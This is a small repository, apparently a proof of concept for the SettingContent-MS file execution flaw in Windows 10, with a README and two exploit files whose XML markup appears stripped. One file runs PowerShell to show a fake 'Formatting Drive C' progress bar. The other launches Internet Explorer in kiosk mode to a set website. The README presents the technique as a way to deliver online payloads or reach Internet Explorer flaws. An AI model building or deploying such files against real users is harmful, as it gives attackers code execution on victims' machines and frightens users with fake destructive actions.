├── LoadPowershellDemo.SettingContent-MS
├── README.md
└── TestWebsite.SettingContent-MS-File
/LoadPowershellDemo.SettingContent-MS:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
6 | "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" -c
7 | For ($i=0; $i -le 100; $i++) {Start-Sleep -Milliseconds 20
8 | Write-Progress -id 1 -Activity 'Formatting Drive C' -Status 'Current Count: $i' -PercentComplete $i -CurrentOperation 'Formatting ...'}
9 | %windir%\system32\control.exe
10 |
11 |
12 |
13 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D}
14 |
15 |
16 | @shell32.dll,-4161
17 | @shell32.dll,-4161
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SettingContent-MS-File-Execution
2 | SettingContent-MS File Execution vulnerability in Windows 10
3 | Proof of concept for SettingContent-MS File Execution Vulnerability in Windows 10
4 | Download and execute LoadWebsite.SettingContent-MS
5 | Website will automatically load Internet Explorer, load a specific site and maximize the screen.
6 | This can be used to leverage existing vulnerabilities in Internet Explorer or target via an online payload
7 | Vulnerability first discovered by Matt Nelson
8 | Documented: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
9 |
10 | Created by: Brad Voris
11 |
12 |
13 |
14 |
15 | ## Connect with me at
16 | Victim Of Technology
17 |
18 | 





19 |
--------------------------------------------------------------------------------
/TestWebsite.SettingContent-MS-File:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
6 | %windir%\system32\cmd.exe /c "C:\Program Files\Internet Explorer\iexplore.exe" -k https://www.victimoftechnology.com
7 | %windir%\system32\control.exe
8 |
9 |
10 |
11 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D}
12 |
13 |
14 | @shell32.dll,-4161
15 | @shell32.dll,-4161
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------